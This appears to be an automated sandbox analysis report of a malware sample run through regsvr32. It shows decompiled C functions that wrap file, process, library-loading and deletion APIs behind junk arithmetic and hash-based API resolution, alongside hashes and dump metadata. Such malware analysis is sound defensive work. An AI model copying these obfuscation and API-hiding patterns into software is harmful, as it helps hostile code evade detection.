                                                                                                                • Associated: 0000000A.00000002.482269667.0000000000284000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_260000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: DeleteFile
                                                                                                                • String ID: Z8
                                                                                                                • API String ID: 4033686569-4113373922
                                                                                                                • Opcode ID: 308f64f918a83fe14fd2a0715591c9d5f769be9384a043c1aa0fb948248b5d4f
                                                                                                                • Instruction ID: 65bb7d12bd84806680f60667ce4294f1764d7d9a731b42299e949cb93bcad589
                                                                                                                • Opcode Fuzzy Hash: 308f64f918a83fe14fd2a0715591c9d5f769be9384a043c1aa0fb948248b5d4f
                                                                                                                • Instruction Fuzzy Hash: E7116DB1D0124CFFDB08DFE5E94AAAEBBB1EB40304F208198E41477290D7B65B548F50
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 555 27ed7b-27ee13 call 26c98a call 267f78 CloseServiceHandle
                                                                                                                C-Code - Quality: 82%
                                                                                                                			E0027ED7B(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                				unsigned int _v8;
                                                                                                                				signed int _v12;
                                                                                                                				signed int _v16;
                                                                                                                				void* _t33;
                                                                                                                				int _t43;
                                                                                                                				signed int _t45;
                                                                                                                				signed int _t46;
                                                                                                                				void* _t53;
                                                                                                                
                                                                                                                				_push(_a8);
                                                                                                                				_t53 = __ecx;
                                                                                                                				_push(_a4);
                                                                                                                				_push(__ecx);
                                                                                                                				E0026C98A(_t33);
                                                                                                                				_v16 = 0xcf28aa;
                                                                                                                				_v16 = _v16 + 0xffff6a13;
                                                                                                                				_v16 = _v16 ^ 0x00c8c4e4;
                                                                                                                				_v12 = 0x49ff01;
                                                                                                                				_t45 = 0xb;
                                                                                                                				_v12 = _v12 / _t45;
                                                                                                                				_t46 = 0x5d;
                                                                                                                				_v12 = _v12 / _t46;
                                                                                                                				_v12 = _v12 ^ 0x00001054;
                                                                                                                				_v8 = 0x2a1e4a;
                                                                                                                				_v8 = _v8 | 0x32e5c17e;
                                                                                                                				_v8 = _v8 >> 0xb;
                                                                                                                				_v8 = _v8 ^ 0x00072801;
                                                                                                                				E00267F78(_t46, 0x616ae4, _t46, 0x1ec, _t46, 0x378734d);
                                                                                                                				_t43 = CloseServiceHandle(_t53); // executed
                                                                                                                				return _t43;
                                                                                                                			}

                                                                                                                APIs
                                                                                                                • CloseServiceHandle.ADVAPI32(?,?,?,?,?,?,?,?,?), ref: 0027EE0D
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.482255852.0000000000261000.00000020.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.482251829.0000000000260000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 0000000A.00000002.482269667.0000000000284000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_260000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CloseHandleService
                                                                                                                • String ID: ja
                                                                                                                • API String ID: 1725840886-1100367487
                                                                                                                • Opcode ID: bd4baa143e4bbac4393e19cbb486165dce33cce1ded8bef3e0e8cbd8b074dfa4
                                                                                                                • Instruction ID: 7395ae7a07a664782f4d0e16acb8dd581b1b25db250291ae45c801ac7b0d95a6
                                                                                                                • Opcode Fuzzy Hash: bd4baa143e4bbac4393e19cbb486165dce33cce1ded8bef3e0e8cbd8b074dfa4
                                                                                                                • Instruction Fuzzy Hash: 34015B71D01208BFDB08EFA4C94A8DEBFB5EF45314F10C08AE914A7241E7B25BA58F40
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 79%
                                                                                                                			E00264A9D(void* __ecx, WCHAR* __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                				signed int _v8;
                                                                                                                				signed int _v12;
                                                                                                                				signed int _v16;
                                                                                                                				signed int _v20;
                                                                                                                				signed int _v24;
                                                                                                                				intOrPtr _v28;
                                                                                                                				void* _t32;
                                                                                                                				struct HINSTANCE__* _t39;
                                                                                                                				WCHAR* _t43;
                                                                                                                
                                                                                                                				_push(_a8);
                                                                                                                				_t43 = __edx;
                                                                                                                				_push(_a4);
                                                                                                                				_push(__edx);
                                                                                                                				_push(__ecx);
                                                                                                                				E0026C98A(_t32);
                                                                                                                				_v24 = _v24 & 0x00000000;
                                                                                                                				_v20 = _v20 & 0x00000000;
                                                                                                                				_v28 = 0x1178a2;
                                                                                                                				_v16 = 0x17846b;
                                                                                                                				_v16 = _v16 | 0x3185073b;
                                                                                                                				_v16 = _v16 + 0xffff538e;
                                                                                                                				_v16 = _v16 ^ 0x3197b69f;
                                                                                                                				_v12 = 0x16ba99;
                                                                                                                				_v12 = _v12 ^ 0x02625a09;
                                                                                                                				_v12 = _v12 ^ 0x25365766;
                                                                                                                				_v12 = _v12 ^ 0x27431ab3;
                                                                                                                				_v8 = 0xb183e3;
                                                                                                                				_v8 = _v8 * 0x28;
                                                                                                                				_v8 = _v8 | 0x77f20d23;
                                                                                                                				_v8 = _v8 ^ 0x7ff151f0;
                                                                                                                				E00267F78(__ecx, 0xbd3f148a, __ecx, 0x32, __ecx, 0xc1451b2a);
                                                                                                                				_t39 = LoadLibraryW(_t43); // executed
                                                                                                                				return _t39;
                                                                                                                			}

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.482255852.0000000000261000.00000020.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.482251829.0000000000260000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 0000000A.00000002.482269667.0000000000284000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_260000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: LibraryLoad
                                                                                                                • String ID: fW6%
                                                                                                                • API String ID: 1029625771-2497841860
                                                                                                                • Opcode ID: 394d79df2e022e3103ed5dfbf4f970570035fa9306bbb3e241013eecdf3199c8
                                                                                                                • Instruction ID: 6975cdfaabf10edf3afc085a59ab614dc7cfd532d2b1d3055026d7f169eb9ecc
                                                                                                                • Opcode Fuzzy Hash: 394d79df2e022e3103ed5dfbf4f970570035fa9306bbb3e241013eecdf3199c8
                                                                                                                • Instruction Fuzzy Hash: 78114871C11208FFCB08EFA4DA469DEBBB4EB00315F20C188E415B6251D3704B548F90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E00277B25() {
                                                                                                                				signed int _v8;
                                                                                                                				unsigned int _v12;
                                                                                                                				signed int _v16;
                                                                                                                				signed int _t31;
                                                                                                                
                                                                                                                				_v16 = 0x340970;
                                                                                                                				_t2 =  &_v16; // 0x340970
                                                                                                                				_t31 = 0x26;
                                                                                                                				_v16 =  *_t2 / _t31;
                                                                                                                				_v16 = _v16 ^ 0x000e30ec;
                                                                                                                				_v8 = 0x85299d;
                                                                                                                				_v8 = _v8 + 0xa54a;
                                                                                                                				_v8 = _v8 ^ 0x35a74c3e;
                                                                                                                				_v8 = _v8 ^ 0x3521895a;
                                                                                                                				_v12 = 0xcc7db5;
                                                                                                                				_v12 = _v12 >> 9;
                                                                                                                				_v12 = _v12 ^ 0x000f948d;
                                                                                                                				E00267F78(_t31, 0xbd3f148a, _t31, 0x108, _t31, 0xac0441b9);
                                                                                                                				ExitProcess(0);
                                                                                                                			}

                                                                                                                APIs
                                                                                                                • ExitProcess.KERNEL32(00000000), ref: 00277B98
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.482255852.0000000000261000.00000020.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.482251829.0000000000260000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 0000000A.00000002.482269667.0000000000284000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_260000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: ExitProcess
                                                                                                                • String ID: p4
                                                                                                                • API String ID: 621844428-1539767998
                                                                                                                • Opcode ID: 94c440c38613cd405a4d170ca76893493cc6bc59e85da6168acdace7e4be3644
                                                                                                                • Instruction ID: 8e132a2bffa235218f50a70c64e6a18ea45b36cc3846690a5a83cd16c89abcc9
                                                                                                                • Opcode Fuzzy Hash: 94c440c38613cd405a4d170ca76893493cc6bc59e85da6168acdace7e4be3644
                                                                                                                • Instruction Fuzzy Hash: B9F08C71E0030CFBDB44DBE5D94AA9EBBF0EB50304F20C088D915A7241D7B56B188F41
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 53%
                                                                                                                			E0027A50A(void* __edx, long _a4, intOrPtr _a8, intOrPtr _a12, long _a16, intOrPtr _a20, intOrPtr _a24, long _a28, intOrPtr _a36, long _a40, intOrPtr _a44, WCHAR* _a48) {
                                                                                                                				signed int _v8;
                                                                                                                				signed int _v12;
                                                                                                                				signed int _v16;
                                                                                                                				struct _SECURITY_ATTRIBUTES* _v20;
                                                                                                                				intOrPtr _v24;
                                                                                                                				intOrPtr _v28;
                                                                                                                				void* _t54;
                                                                                                                				void* _t65;
                                                                                                                				signed int _t66;
                                                                                                                				signed int _t67;
                                                                                                                
                                                                                                                				_push(_a48);
                                                                                                                				_push(_a44);
                                                                                                                				_push(_a40);
                                                                                                                				_push(_a36);
                                                                                                                				_push(0);
                                                                                                                				_push(_a28);
                                                                                                                				_push(_a24);
                                                                                                                				_push(_a20);
                                                                                                                				_push(_a16);
                                                                                                                				_push(_a12);
                                                                                                                				_push(_a8);
                                                                                                                				_push(_a4);
                                                                                                                				_push(0);
                                                                                                                				E0026C98A(_t54);
                                                                                                                				_v28 = 0xdc14f8;
                                                                                                                				_v24 = 0xd964fd;
                                                                                                                				_v20 = 0;
                                                                                                                				_v16 = 0xcfd091;
                                                                                                                				_v16 = _v16 << 0x10;
                                                                                                                				_v16 = _v16 << 8;
                                                                                                                				_v16 = _v16 ^ 0x910ec0c9;
                                                                                                                				_v12 = 0x7a2ff2;
                                                                                                                				_t66 = 0x43;
                                                                                                                				_v12 = _v12 / _t66;
                                                                                                                				_v12 = _v12 | 0xd721c1d7;
                                                                                                                				_v12 = _v12 ^ 0xd727192a;
                                                                                                                				_v8 = 0x1eb7c0;
                                                                                                                				_v8 = _v8 ^ 0x33199484;
                                                                                                                				_t67 = 0x2d;
                                                                                                                				_v8 = _v8 * 0xa;
                                                                                                                				_v8 = _v8 / _t67;
                                                                                                                				_v8 = _v8 ^ 0x05a21ecf;
                                                                                                                				E00267F78(_t67, 0xbd3f148a, _t67, 0x203, _t67, 0x939ae237);
                                                                                                                				_t65 = CreateFileW(_a48, _a28, _a40, 0, _a4, _a16, 0); // executed
                                                                                                                				return _t65;
                                                                                                                			}














                                                                                                                APIs
                                                                                                                • CreateFileW.KERNEL32(?,?,?,00000000,D727192A,00D964FD,00000000), ref: 0027A5E4
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.482255852.0000000000261000.00000020.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.482251829.0000000000260000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 0000000A.00000002.482269667.0000000000284000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_260000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CreateFile
                                                                                                                • String ID:
                                                                                                                • API String ID: 823142352-0
                                                                                                                • Opcode ID: 437ca9c9c9e6bbc918406cc15dcd8751e725cea46ce31b3af92ae7b3c8ede5d5
                                                                                                                • Instruction ID: ce8afb66c7b32d13b6cd8751bc105608270d867ccf8eb4a335d76bb198c7f3e2
                                                                                                                • Opcode Fuzzy Hash: 437ca9c9c9e6bbc918406cc15dcd8751e725cea46ce31b3af92ae7b3c8ede5d5
                                                                                                                • Instruction Fuzzy Hash: 8221C372901108FBDF05DFE9D94A9EEBFB6EF48314F108149FA1866260D3728A609F91
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 39%
                                                                                                                			E0026816B(struct _STARTUPINFOW* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a20, intOrPtr _a24, intOrPtr _a32, WCHAR* _a40, intOrPtr _a48, intOrPtr _a52, struct _PROCESS_INFORMATION* _a56, WCHAR* _a60, int _a64) {
                                                                                                                				unsigned int _v8;
                                                                                                                				signed int _v12;
                                                                                                                				unsigned int _v16;
                                                                                                                				void* _t45;
                                                                                                                				int _t52;
                                                                                                                				struct _STARTUPINFOW* _t56;
                                                                                                                
                                                                                                                				_push(_a64);
                                                                                                                				_t56 = __ecx;
                                                                                                                				_push(_a60);
                                                                                                                				_push(_a56);
                                                                                                                				_push(_a52);
                                                                                                                				_push(_a48);
                                                                                                                				_push(0);
                                                                                                                				_push(_a40);
                                                                                                                				_push(0);
                                                                                                                				_push(_a32);
                                                                                                                				_push(0);
                                                                                                                				_push(_a24);
                                                                                                                				_push(_a20);
                                                                                                                				_push(0);
                                                                                                                				_push(_a12);
                                                                                                                				_push(_a8);
                                                                                                                				_push(_a4);
                                                                                                                				_push(0);
                                                                                                                				_push(__ecx);
                                                                                                                				E0026C98A(_t45);
                                                                                                                				_v12 = 0x5160ce;
                                                                                                                				_v12 = _v12 ^ 0x33bed16b;
                                                                                                                				_v12 = _v12 + 0xffffe3b5;
                                                                                                                				_v12 = _v12 | 0x3554987c;
                                                                                                                				_v12 = _v12 ^ 0x37f1882e;
                                                                                                                				_v8 = 0x57d154;
                                                                                                                				_v8 = _v8 + 0xffff861a;
                                                                                                                				_v8 = _v8 * 0x3e;
                                                                                                                				_v8 = _v8 >> 8;
                                                                                                                				_v8 = _v8 ^ 0x0012f1da;
                                                                                                                				_v16 = 0x81ccd1;
                                                                                                                				_v16 = _v16 >> 4;
                                                                                                                				_v16 = _v16 >> 5;
                                                                                                                				_v16 = _v16 ^ 0x000c22df;
                                                                                                                				E00267F78(__ecx, 0xbd3f148a, __ecx, 0x245, __ecx, 0x989b5ecc);
                                                                                                                				_t52 = CreateProcessW(_a40, _a60, 0, 0, _a64, 0, 0, 0, _t56, _a56); // executed
                                                                                                                				return _t52;
                                                                                                                			}










                                                                                                                APIs
                                                                                                                • CreateProcessW.KERNEL32(?,?,00000000,00000000,?,00000000,00000000,00000000,00000044,?), ref: 00268236
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.482255852.0000000000261000.00000020.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.482251829.0000000000260000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 0000000A.00000002.482269667.0000000000284000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_260000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CreateProcess
                                                                                                                • String ID:
                                                                                                                • API String ID: 963392458-0
                                                                                                                • Opcode ID: 7e58e5a2dccc3d8a10dddd634ea05ac90ad53dce594303d851aa7f7164f25884
                                                                                                                • Instruction ID: 32c12780bd47bfd4084706e3a8e2cea4ee0a90bc2deb42aa388b411861652dd8
                                                                                                                • Opcode Fuzzy Hash: 7e58e5a2dccc3d8a10dddd634ea05ac90ad53dce594303d851aa7f7164f25884
                                                                                                                • Instruction Fuzzy Hash: 1721F332801248BBCF159F95CD09CCEBFB9EB89714F108098FA1562121C3728A64EF50
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 58%
                                                                                                                			E00263466(void* __ecx, void* __edx, intOrPtr _a12, intOrPtr _a16, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32) {
                                                                                                                				unsigned int _v8;
                                                                                                                				signed int _v12;
                                                                                                                				unsigned int _v16;
                                                                                                                				void* _t29;
                                                                                                                				intOrPtr* _t35;
                                                                                                                				void* _t36;
                                                                                                                				void* _t41;
                                                                                                                
                                                                                                                				_t41 = __ecx;
                                                                                                                				E0026C98A(_t29);
                                                                                                                				_v8 = 0x88f6ec;
                                                                                                                				_v8 = _v8 | 0x6177bf25;
                                                                                                                				_v8 = _v8 >> 0xb;
                                                                                                                				_v8 = _v8 + 0x167f;
                                                                                                                				_v8 = _v8 ^ 0x0004f919;
                                                                                                                				_v16 = 0x9ca171;
                                                                                                                				_v16 = _v16 >> 8;
                                                                                                                				_v16 = _v16 ^ 0x0005b7ae;
                                                                                                                				_v12 = 0xf5b080;
                                                                                                                				_v12 = _v12 * 0x58;
                                                                                                                				_v12 = _v12 ^ 0x54793a02;
                                                                                                                				_t35 = E00267F78(__ecx, 0xffc5979d, __ecx, 0xcc, __ecx, 0x31e1b46b);
                                                                                                                				_t36 =  *_t35(0, _t41, 0, 0, _a12, __ecx, __edx, 0, 0, _a12, _a16, 0, _a24, _a28, _a32); // executed
                                                                                                                				return _t36;
                                                                                                                			}











                                                                                                                APIs
                                                                                                                • SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,?), ref: 002634FE
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.482255852.0000000000261000.00000020.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.482251829.0000000000260000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 0000000A.00000002.482269667.0000000000284000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_260000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: FolderPath
                                                                                                                • String ID:
                                                                                                                • API String ID: 1514166925-0
                                                                                                                • Opcode ID: b1b65bccfc9919860329f926e3a24493a6d1cd56ea2b7ea92be5dd5deacbab9f
                                                                                                                • Instruction ID: 6b8a7f0307260809b4696684159b8ef26db7b0e9070ecf99584bb224e8955b15
                                                                                                                • Opcode Fuzzy Hash: b1b65bccfc9919860329f926e3a24493a6d1cd56ea2b7ea92be5dd5deacbab9f
                                                                                                                • Instruction Fuzzy Hash: 00113671805248BBCB11DFA6DD0ACAFBFB8EB85704F108098F914A2210D3714B24DF61
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 58%
                                                                                                                			E0027EAB3(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
                                                                                                                				signed int _v8;
                                                                                                                				unsigned int _v12;
                                                                                                                				signed int _v16;
                                                                                                                				intOrPtr _v20;
                                                                                                                				intOrPtr _v24;
                                                                                                                				intOrPtr _v28;
                                                                                                                				void* _t35;
                                                                                                                				intOrPtr* _t40;
                                                                                                                				void* _t41;
                                                                                                                
                                                                                                                				E0026C98A(_t35);
                                                                                                                				_v28 = 0xe6c580;
                                                                                                                				_v24 = 0;
                                                                                                                				_v20 = 0;
                                                                                                                				_v8 = 0x2d161b;
                                                                                                                				_v8 = _v8 + 0xffffdf88;
                                                                                                                				_v8 = _v8 >> 0xa;
                                                                                                                				_v8 = _v8 | 0xc1e5ff2b;
                                                                                                                				_v8 = _v8 ^ 0xc1e88dee;
                                                                                                                				_v16 = 0xd78d92;
                                                                                                                				_v16 = _v16 ^ 0xcf4c3c1d;
                                                                                                                				_v16 = _v16 ^ 0xcf92c072;
                                                                                                                				_v12 = 0x4f9c9d;
                                                                                                                				_v12 = _v12 >> 4;
                                                                                                                				_v12 = _v12 + 0xffff6ea2;
                                                                                                                				_v12 = _v12 ^ 0x00061ead;
                                                                                                                				_t40 = E00267F78(__ecx, 0xbd3f148a, __ecx, 0x47, __ecx, 0x6e03cec5);
                                                                                                                				_t41 =  *_t40(_a16, 0, _a12, 0x28, 0x28, __edx, _a4, 0, _a12, _a16, _a20, _a24); // executed
                                                                                                                				return _t41;
                                                                                                                			}













                                                                                                                APIs
                                                                                                                • SetFileInformationByHandle.KERNEL32(000B5C15,00000000,?,00000028,?,?,?,?,?,?,?,?,?,?,?,00000023), ref: 0027EB5A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.482255852.0000000000261000.00000020.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.482251829.0000000000260000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 0000000A.00000002.482269667.0000000000284000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_260000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: FileHandleInformation
                                                                                                                • String ID:
                                                                                                                • API String ID: 3935143524-0
                                                                                                                • Opcode ID: 62f4fd11f1bee2b778a12be1f39848d568871edb8fd1f68545c84305743f77cd
                                                                                                                • Instruction ID: 5179a82dde4f02a5c68a304f3f63aa7566c30dde5077ac6b45a7aa6eaccd67a3
                                                                                                                • Opcode Fuzzy Hash: 62f4fd11f1bee2b778a12be1f39848d568871edb8fd1f68545c84305743f77cd
                                                                                                                • Instruction Fuzzy Hash: 16111676C0221DFFCF10DFA4990A9EEBF74EB44314F108089E914A6294D3B14B649FA1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 88%
                                                                                                                			E00277DA0(void* __ecx, struct _SHFILEOPSTRUCTW* __edx, intOrPtr _a4) {
                                                                                                                				signed int _v8;
                                                                                                                				signed int _v12;
                                                                                                                				signed int _v16;
                                                                                                                				void* _t34;
                                                                                                                				int _t44;
                                                                                                                				signed int _t46;
                                                                                                                				signed int _t47;
                                                                                                                				struct _SHFILEOPSTRUCTW* _t54;
                                                                                                                
                                                                                                                				_push(_a4);
                                                                                                                				_t54 = __edx;
                                                                                                                				_push(__edx);
                                                                                                                				E0026C98A(_t34);
                                                                                                                				_v12 = 0xcdb49a;
                                                                                                                				_v12 = _v12 + 0x8f05;
                                                                                                                				_v12 = _v12 + 0xffff9965;
                                                                                                                				_v12 = _v12 ^ 0x00c100f7;
                                                                                                                				_v16 = 0xfe6a9a;
                                                                                                                				_v16 = _v16 + 0xffff1466;
                                                                                                                				_v16 = _v16 ^ 0x00fd95e9;
                                                                                                                				_v8 = 0xca762f;
                                                                                                                				_v8 = _v8 << 0xe;
                                                                                                                				_t46 = 0x7f;
                                                                                                                				_v8 = _v8 / _t46;
                                                                                                                				_t47 = 0x2e;
                                                                                                                				_v8 = _v8 / _t47;
                                                                                                                				_v8 = _v8 ^ 0x00082e4e;
                                                                                                                				E00267F78(_t47, 0xffc5979d, _t47, 0xab, _t47, 0x3ddf729);
                                                                                                                				_t44 = SHFileOperationW(_t54); // executed
                                                                                                                				return _t44;
                                                                                                                			}












                                                                                                                APIs
                                                                                                                • SHFileOperationW.SHELL32(?), ref: 00277E36
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.482255852.0000000000261000.00000020.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.482251829.0000000000260000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 0000000A.00000002.482269667.0000000000284000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_260000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: FileOperation
                                                                                                                • String ID:
                                                                                                                • API String ID: 3080627654-0
                                                                                                                • Opcode ID: 2a16452b27a4fc3da9f362e710a0266374990953f3da1891371b7e6ecd306318
                                                                                                                • Instruction ID: 4801818a47cfa4c80745a7deaa3cad21df97d4cc8ae894773bf373f53c389fec
                                                                                                                • Opcode Fuzzy Hash: 2a16452b27a4fc3da9f362e710a0266374990953f3da1891371b7e6ecd306318
                                                                                                                • Instruction Fuzzy Hash: 76118BB1D05208FFDB14DFA9D80A8DEBBB5EB45314F20C199E418A7241E7B55F549F40
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 72%
                                                                                                                			E00263506(void* __ecx, void* __edx, void* _a4, long _a8, intOrPtr _a12, long _a16, intOrPtr _a20) {
                                                                                                                				signed int _v8;
                                                                                                                				signed int _v12;
                                                                                                                				signed int _v16;
                                                                                                                				void* _t39;
                                                                                                                				void* _t47;
                                                                                                                				signed int _t49;
                                                                                                                
                                                                                                                				_push(_a20);
                                                                                                                				_push(_a16);
                                                                                                                				_push(_a12);
                                                                                                                				_push(_a8);
                                                                                                                				_push(_a4);
                                                                                                                				E0026C98A(_t39);
                                                                                                                				_v16 = 0xf4e2fc;
                                                                                                                				_t49 = 0x3b;
                                                                                                                				_v16 = _v16 / _t49;
                                                                                                                				_v16 = _v16 ^ 0x00083f87;
                                                                                                                				_v12 = 0x549d10;
                                                                                                                				_v12 = _v12 << 0xd;
                                                                                                                				_v12 = _v12 + 0xffff8515;
                                                                                                                				_v12 = _v12 | 0x9f85c2ad;
                                                                                                                				_v12 = _v12 ^ 0x9fa0e66d;
                                                                                                                				_v8 = 0xbeaf63;
                                                                                                                				_v8 = _v8 | 0x7acbe5f7;
                                                                                                                				_v8 = _v8 << 0xf;
                                                                                                                				_v8 = _v8 ^ 0x3b62dfe8;
                                                                                                                				_v8 = _v8 ^ 0xcc9b72fd;
                                                                                                                				E00267F78(_t49, 0xbd3f148a, _t49, 0x106, _t49, 0xba07f621);
                                                                                                                				_t47 = RtlAllocateHeap(_a4, _a16, _a8); // executed
                                                                                                                				return _t47;
                                                                                                                			}










                                                                                                                APIs
                                                                                                                • RtlAllocateHeap.NTDLL(9FA0E66D,?,00083F87), ref: 002635AB
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000A.00000002.482255852.0000000000261000.00000020.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: true
                                                                                                                • Associated: 0000000A.00000002.482251829.0000000000260000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                • Associated: 0000000A.00000002.482269667.0000000000284000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_10_2_260000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: AllocateHeap
                                                                                                                • String ID:
                                                                                                                • API String ID: 1279760036-0
                                                                                                                • Opcode ID: f96f459a1562cf0811398c59acc1a6a1e894971d13c8e85bf07d59f40b728169
                                                                                                                • Instruction ID: bc40ab93772997e3082464e7b39fdd65b6978a552b0792923d601bffa07b42ae
                                                                                                                • Opcode Fuzzy Hash: f96f459a1562cf0811398c59acc1a6a1e894971d13c8e85bf07d59f40b728169
                                                                                                                • Instruction Fuzzy Hash: 4E1125B1D01208BFCF04EFA4D84689EBFB5EB44704F208088F9146A221D3728B64EF90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 85%
                                                                                                                			E002702D8(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                				signed int _v8;
                                                                                                                				signed int _v12;
                                                                                                                				signed int _v16;
                                                                                                                				void* _t45;
                                                                                                                				int _t59;
                                                                                                                				signed int _t61;
                                                                                                                				signed int _t62;
                                                                                                                				signed int _t63;
                                                                                                                				signed int _t64;
                                                                                                                				void* _t75;
                                                                                                                
                                                                                                                				_push(_a8);
                                                                                                                				_t75 = __ecx;
                                                                                                                				_push(_a4);
                                                                                                                				_push(__ecx);
                                                                                                                				E0026C98A(_t45);
                                                                                                                				_v12 = 0xd4268f;
                                                                                                                				_t61 = 0x55;
                                                                                                                				_v12 = _v12 / _t61;
                                                                                                                				_t62 = 0x39;
                                                                                                                				_v12 = _v12 / _t62;
                                                                                                                				_t63 = 0x19;
                                                                                                                				_v12 = _v12 / _t63;
                                                                                                                				_v12 = _v12 ^ 0x00038c24;
                                                                                                                				_v16 = 0xae7fc4;
                                                                                                                				_v16 = _v16 + 0x7c1;
                                                                                                                				_v16 = _v16 ^ 0x00ac1f44;
                                                                                                                				_v8 = 0x83f9bc;
                                                                                                                				_v8 = _v8 ^ 0x1ab9b921;
                                                                                                                				_v8 = _v8 | 0xa5451e1d;
                                                                                                                				_t64 = 0x5c;
                                                                                                                				_v8 = _v8 / _t64;
                                                                                                                				_v8 = _v8 ^ 0x021ff71d;
                                                                                                                				E00267F78(_t64, 0xbd3f148a, _t64, 0x72, _t64, 0x529e328);
                                                                                                                				_t59 = CloseHandle(_t75); // executed
                                                                                                                				return _t59;
                                                                                                                			}














                                                                                                                APIs
                                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 00270384
                                                                                                                Memory Dump Source
